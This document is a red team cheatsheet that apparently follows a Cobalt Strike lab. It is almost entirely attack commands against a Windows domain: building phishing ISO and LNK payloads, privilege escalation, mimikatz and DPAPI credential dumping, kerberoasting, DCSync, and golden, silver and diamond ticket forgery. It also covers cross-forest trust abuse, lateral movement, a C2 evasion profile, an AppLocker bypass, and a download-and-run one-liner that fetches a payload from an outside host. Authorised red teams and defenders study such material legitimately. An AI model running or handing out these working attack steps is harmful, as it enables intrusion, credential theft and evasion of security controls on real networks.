Red Team Operations
Methodology & Cheatsheet

$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("C:\Payloads\deals\deals.xlsx.lnk")
$lnk.TargetPath = "%COMSPEC%"
$lnk.Arguments = "/C start deals.xlsx && wscript deals.js"
$lnk.IconLocation = "%ProgramFiles%\Microsoft Office\root\Office16\EXCEL.EXE,0"
$lnk.Save()

python3 /mnt/c/Tools/PackMyPayload/PackMyPayload.py -H deals.xlsx,deals.js /mnt/c/Payloads/deals/ /mnt/c/Payloads/deals/deals.iso

spawn x64 dns

spawnas CONTOSO\rsteel Passw0rd! tcp-local

cd C:\Users\pchilds\Documents
pwd
ls
download password.txt
# View > Downloads → Sync Files

shell whoami /user               # via cmd.exe
powershell $env:computername    # via powershell.exe
powerpick $env:computername     # unmanaged powershell (no powershell.exe)
execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe AntiVirus
ipconfig                        # BOF execution

powerpick $lowpriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'); ls 'HKLM:\SYSTEM\CurrentControlSet\Services' | % { $acl = Get-Acl $_.PSPath; foreach ($ace in $acl.Access) { if ($ace.AccessControlType -eq 'Allow' -and $ace.IsInherited -eq $false -and $lowpriv -contains $ace.IdentityReference.Value -and $ace.RegistryRights -eq [System.Security.AccessControl.RegistryRights]::FullControl) { [PSCustomObject] @{ServiceName = $_.PSChildName; Identity = $ace.IdentityReference.Value; Rights = $ace.RegistryRights }}}}

sc_qc BadWindowsService                           # verify binary path
cacls "C:\Program Files\Bad Windows Service"      # check write perms
cd C:\Program Files\Bad Windows Service
upload C:\Payloads\dns_x64.svc.exe
mv dns_x64.svc.exe Service.exe                   # activates hijack
sc_stop BadWindowsService
sc_start BadWindowsService
# Beacon appears. Then cleanup:
rm Service.exe

spawn x64 http           # spawns in C:\Windows\System32\rundll32.exe
# Right-click new Beacon → Access → One-liner → tcp-local listener
runasadmin uac-cmstplua [ONE-LINER]
connect localhost 1337

# 1. Host PS one-liner: Right-click Beacon → Access → One-liner
# 2. Generate gadget:
C:\Tools\ysoserial.net\ysoserial\bin\Release\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "powershell -nop -ep bypass -enc ..." -o raw --outputpath=C:\Payloads\data.bin
# 3. Upload and wait up to 60s:
cd C:\Temp
upload C:\Payloads\data.bin
# Elevated Beacon appears. Cleanup:
rm data.bin

cd C:\Windows\System32
upload C:\Payloads\dns_x64.svc.exe
mv dns_x64.svc.exe debug_svc.exe
sc_create dbgsvc "Debug Service" C:\Windows\System32\debug_svc.exe "Windows Debug Service" 0 2 3
# Reboot → SYSTEM Beacon appears
sc_delete dbgsvc

# Chrome credentials
execute-assembly C:\Tools\SharpDPAPI\SharpChrome\bin\Release\SharpChrome.exe logins

# Windows Vault
execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault

# Decrypt DPAPI credentials via RPC
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials /rpc

mimikatz sekurlsa::logonpasswords   # plaintext + hashes from LSASS
mimikatz sekurlsa::ekeys            # Kerberos AES keys
mimikatz lsadump::sam               # local SAM hashes
mimikatz lsadump::cache             # cached domain credentials (MSCACHE)

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /format:hashcat /nowrap

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /format:hashcat /simple
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /format:hashcat /user:mssql_svc /nowrap

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:[LUID] /service:krbtgt /nowrap

make_token CONTOSO\rsteel Passw0rd!
# Drop impersonation:
rev2self

process_browser
# Select process owned by target → Steal Token → TOKEN_ALL_ACCESS → Store: True
token-store use 0
# Drop:
rev2self
token-store remove 0

pth CONTOSO\rsteel fc525c9683e8fe067095ba2ddc971889
rev2self

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:rsteel /domain:CONTOSO.COM /aes256:[AES256_HASH] /nowrap

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\notepad.exe /username:rsteel /domain:CONTOSO.COM /password:FakePass /ticket:[TGT]

process_browser
# Select process owned by rsteel → Inject → tcp-local listener

ldapsearch (|(objectClass=domain)(objectClass=organizationalUnit)(objectClass=groupPolicyContainer)) --attributes *,ntsecuritydescriptor
ldapsearch (|(samAccountType=805306368)(samAccountType=805306369)(samAccountType=268435456)) --attributes *,ntsecuritydescriptor

cd /mnt/c/Users/Attacker/Desktop
scp -r attacker@10.0.0.5:/opt/cobaltstrike/logs .
bofhound -i logs

ls \\contoso.com\SysVol\contoso.com\Policies\{2583E34A-BBCE-4061-9972-E2ADAB399BB4}\Machine\Microsoft\Windows NT\SecEdit\ 
download \\contoso.com\SysVol\contoso.com\Policies\{2583E34A-BBCE-4061-9972-E2ADAB399BB4}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf

MATCH (x:Computer{objectid:'S-1-5-21-3926355307-1661546229-813047887-2101'}) MATCH (y:Group{objectid:'S-1-5-21-3926355307-1661546229-813047887-1106'}) MERGE (y)-[:AdminTo]->(x)
MATCH (x:Computer{objectid:'S-1-5-21-3926355307-1661546229-813047887-2102'}) MATCH (y:Group{objectid:'S-1-5-21-3926355307-1661546229-813047887-1106'}) MERGE (y)-[:AdminTo]->(x)

make_token CONTOSO\rsteel Passw0rd!
ls \\lon-ws-1\c$          # verify access

jump winrm64 lon-ws-1 smb

jump psexec64 lon-ws-1 smb

# Cobalt Strike → Script Manager → load C:\Tools\SCShell\CS-BOF\scshell.cna
jump scshell64 lon-ws-1 smb
jump scshell64 dub-wkstn-2 http

cd \\lon-ws-1\ADMIN$
upload C:\Payloads\smb_x64.exe
remote-exec wmi lon-ws-1 C:\Windows\smb_x64.exe
link lon-ws-1 TSVCPIPE-4b2f70b3-ceba-42a5-a4b5-704e1c41337

ldapsearch (&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288)) --attributes samAccountName

ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe
jump scshell64 lon-ws-1 smb
krb_triage                                      # find dyork@CONTOSO.COM
ldapsearch samAccountName=dyork --attributes memberOf
krb_dump /luid:[LUID] /service:krbtgt

[IO.File]::WriteAllBytes("C:\Users\Attacker\Desktop\dyork_tgt.kirbi", [Convert]::FromBase64String("[TICKET_B64]"))
make_token CONTOSO\dyork Fakepass
kerberos_ticket_use C:\Users\Attacker\Desktop\dyork_tgt.kirbi
ls \\lon-dc-1\c$

ldapsearch (&(samAccountType=805306369)(msDS-AllowedToDelegateTo=*)) --attributes samAccountName,msDS-AllowedToDelegateTo,userAccountControl
[Convert]::ToBoolean(16781312 -band 16777216)    # check TRUSTED_TO_AUTH_FOR_DELEGATION

krb_dump /luid:3e7 /service:krbtgt
krb_s4u /ticket:[TGT] /service:cifs/lon-fs-1 /impersonateuser:Administrator

[IO.File]::WriteAllBytes("C:\Users\Attacker\Desktop\administrator.kirbi", [Convert]::FromBase64String("[TICKET_B64]"))
make_token DUBLIN\Administrator Fakepass
kerberos_ticket_use C:\Users\Attacker\Desktop\administrator.kirbi
ls \\lon-fs-1\c$

krb_s4u /ticket:[TGT] /service:time/lon-fs-1 /altservice:cifs /impersonateuser:Administrator
# Substitutes time/ service → cifs/ for access

make_token CONTOSO\rsteel Passw0rd!
jump psexec64 lon-ws-1 smb
# From lon-ws-1 Beacon:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /nowrap
# From medium-integrity Beacon, trigger DC to authenticate to lon-ws-1:
execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe lon-dc-1 lon-ws-1
# S4U self to get cifs/lon-dc-1 as Administrator:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:cifs/lon-dc-1 /ticket:[TGT] /nowrap
# Create logon session with ticket:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CONTOSO.COM /username:Administrator /password:FakePass /ticket:[CIFS_TICKET]
steal_token [PID]
run klist
ls \\lon-dc-1\c$

# Cobalt Strike → Script Manager → C:\Tools\SQL-BOF\SQL\SQL.cna
ldapsearch (&(samAccountType=805306368)(servicePrincipalName=MSSQLSvc*)) --attributes name,samAccountName,servicePrincipalName
sql-info lon-db-1
sql-whoami lon-db-1
# Impersonate sysadmin and re-check:
make_token DUBLIN\consultant Passw0rd!
sql-whoami lon-db-1

krb_dump /user:rsteel /service:krbtgt
krb_asktgs /service:[SPN] /ticket:[TGT]
[IO.File]::WriteAllBytes("C:\Users\Attacker\Desktop\tgt.kirbi", [Convert]::FromBase64String("[TICKET_B64]"))
make_token CONTOSO\rsteel Fakepass
kerberos_ticket_use C:\Users\Attacker\Desktop\tgt.kirbi
run klist
ls \\lon-dc-1\c$

sql-links lon-db-1                              # enumerate links
sql-whoami lon-db-1 "" lon-db-2               # check privs on lon-db-2 via link
sql-checkrpc lon-db-1                          # check RPC Out status
sql-enablerpc lon-db-1 lon-db-2               # enable RPC Out
sql-clr lon-db-1 C:\Users\Attacker\source\repos\MyProcedure\bin\Release\MyProcedure.dll MyProcedure "" lon-db-2
link lon-db-2 TSVCPIPE-4b2f70b3-ceba-42a5-a4b5-704e1c41337

execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges
cd C:\Windows\ServiceProfiles\MSSQLSERVER\AppData\Local\Microsoft\WindowsApps
upload C:\Payloads\tcp-local_x64.exe
execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p "C:\Windows\ServiceProfiles\MSSQLSERVER\AppData\Local\Microsoft\WindowsApps\tcp-local_x64.exe"
connect localhost 1337

make_token CONTOSO\dyork Passw0rd!
dcsync contoso.com CONTOSO\krbtgt          # grab krbtgt hash
dcsync contoso.com CONTOSO\lon-db-1$      # computer account (include $)
rev2self

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/lon-db-1 /aes256:[HASH] /user:Administrator /domain:CONTOSO.COM /sid:S-1-5-21-3926355307-1661546229-813047887 /nowrap

make_token CONTOSO\Administrator FakePass
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:[TICKET]
run klist
ls \\lon-db-1\c$
run klist purge

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:[HASH] /user:Administrator /domain:CONTOSO.COM /sid:S-1-5-21-3926355307-1661546229-813047887 /nowrap

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:[TICKET]
run klist
ls \\lon-dc-1\c$
run klist purge

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /krbkey:[HASH] /ticketuser:Administrator /ticketuserid:500 /domain:CONTOSO.COM /nowrap
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:[TICKET]
run klist
ls \\lon-dc-1\c$

make_token CONTOSO\dyork Passw0rd!
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe backupkey
rev2self
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials /pvk:[KEY]

# 1. Enumerate trust type
ldapsearch (objectClass=trustedDomain) --attributes trustPartner,trustDirection,trustAttributes,flatName

# 2. DCSync child krbtgt
dcsync dublin.contoso.com DUBLIN\krbtgt

# 3. Get child domain SID
ldapsearch (objectClass=domain) --attributes objectSid

# 4. Get parent domain SID
ldapsearch (objectClass=domain) --attributes objectSid --hostname lon-dc-1.contoso.com --dn DC=contoso,DC=com

# 5. Forge golden ticket with parent's Enterprise Admins SID in /sids
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /user:Administrator /domain:dublin.contoso.com /sid:[DUBLIN_SID] /sids:[CONTOSO_EA_GROUP_SID] /aes256:[DUBLIN_KRBTGT_HASH] /outfile:C:\Users\Attacker\Desktop\golden

# 6. Inject ticket
kerberos_ticket_use C:\Users\Attacker\Desktop\[TICKET]
run klist
ls \\lon-dc-1\c$

# 1. Enumerate trust direction
ldapsearch (objectClass=trustedDomain) --attributes trustDirection,trustPartner,trustAttributes,flatname

# 2. Enumerate Foreign Security Principals
ldapsearch (objectClass=foreignSecurityPrincipal) --attributes cn,memberOf --hostname contoso.com --dn DC=contoso,DC=com

# 3. Identify interesting SID
ldapsearch (objectSid=[SID])

# 4. DCSync inter-realm key
make_token CONTOSO\dyork Passw0rd!
dcsync contoso.com CONTOSO\PARTNER$
rev2self

# 5. Forge referral ticket
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /user:pchilds /domain:CONTOSO.COM /sid:S-1-5-21-3926355307-1661546229-813047887 /id:1105 /groups:513,1106,6102 /service:krbtgt/partner.com /rc4:[NTLM_HASH] /nowrap

# 6. Request service tickets for trusting domain
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/par-jmp-1.partner.com /dc:par-dc-1.partner.com /ticket:[TICKET] /nowrap

# 7. Inject + verify + access
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:[TICKET]
run klist
ls \\par-jmp-1.partner.com\c$

# 1. Enumerate trust
ldapsearch (objectClass=trustedDomain) --attributes trustDirection,trustPartner,trustAttributes,flatName

# 2. Get TDO GUID (medium integrity beacon)
ldapsearch (objectClass=trustedDomain) --attributes name,objectGUID

# 3. Get shared inter-realm key from TDO
mimikatz lsadump::dcsync /domain:partner.com /guid:{[GUID]}

# 4. Request TGT for the trust account
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:PARTNER$ /domain:CONTOSO.COM /dc:lon-dc-1.contoso.com /rc4:[RC4_HASH] /nowrap

# 5. Inject into sacrificial session (high integrity beacon)
make_token CONTOSO\PARTNER$ FakePass
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:[TICKET]
run klist

# 6. Enumerate trusted domain
ldapsearch (objectClass=domain) --dn DC=contoso,DC=com --attributes name,objectSid --hostname contoso.com

stage {
    set userwx "false";
    set cleanup "true";
    set copy_pe_header "false";
    set module_x64 "Hydrogen.dll";
    transform-x64 {
        strrep "beacon.x64.dll" "bacon.x64.dll";
        strrep "%02d/%02d/%02d" "%02d/%02d/%04d";
    }
}

post-ex {
    set spawnto_x64 "%windir%\\sysnative\\werfault.exe";
    set cleanup "true";
    set pipename "dotnet-diagnostic-#####";
    set thread_hint "ntdll.dll!RtlUserThreadStart+0x2c";
    set amsi_disable "true";
    transform-x64 {
        strrepex "PowerPick" "CLRCreateInstance failed w/hr 0x%08lx" "CLRCreateInstance failed: 0x%08lx";
        strrepex "ExecuteAssembly" "Invoke_3 on EntryPoint failed." "Unhandled exception.";
    }
}

process-inject {
    set allocator "VirtualAllocEx";
    set startrwx "false";
    set userwx "false";
    execute {
        CreateThread "ntdll.dll!RtlUserThreadStart+0x2c";
        ObfSetThreadContext "ntdll.dll!RtlUserThreadStart+0x2c";
        NtQueueApcThread-s;
        SetThreadContext;
    }
}

ssh attacker@10.0.0.5
sudo /usr/bin/docker restart cobaltstrike-cs-1
# If error: sudo /usr/bin/docker logs cobaltstrike-cs-1

# Attacks → Scripted Web Delivery → http listener → Launch
# Victim runs:
iex (new-object net.webclient).downloadstring("http://www.bleepincomputer.com/a")
# After Beacon checks in:
make_token CONTOSO\rsteel Passw0rd!
remote-exec winrm lon-ws-1 (Get-MpPreference).DisableRealtimeMonitoring
ak-settings spawnto_x64 C:\Windows\System32\svchost.exe
jump psexec64 lon-ws-1 smb

$policy = Get-AppLockerPolicy -Effective
$policy.RuleCollections

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe test.csproj

$ExecutionContext.SessionState.LanguageMode
[System.Guid]::NewGuid()    # generate GUID for the COM registration

New-Item -Path 'HKCU:Software\Classes\CLSID' -Name '{6136e053-47cb-4fdd-84b1-381bc5f3edb3}'
New-Item -Path 'HKCU:Software\Classes\CLSID\{6136e053-47cb-4fdd-84b1-381bc5f3edb3}' -Name 'InprocServer32' -Value 'C:\Users\pchilds\Desktop\bypass.dll'
New-ItemProperty -Path 'HKCU:Software\Classes\CLSID\{6136e053-47cb-4fdd-84b1-381bc5f3edb3}\InprocServer32' -Name 'ThreadingModel' -Value 'Both'
New-Item -Path 'HKCU:Software\Classes' -Name 'AppLocker.Bypass' -Value 'AppLocker Bypass'
New-Item -Path 'HKCU:Software\Classes\AppLocker.Bypass' -Name 'CLSID' -Value '{6136e053-47cb-4fdd-84b1-381bc5f3edb3}'

rundll32 bypass.dll,execute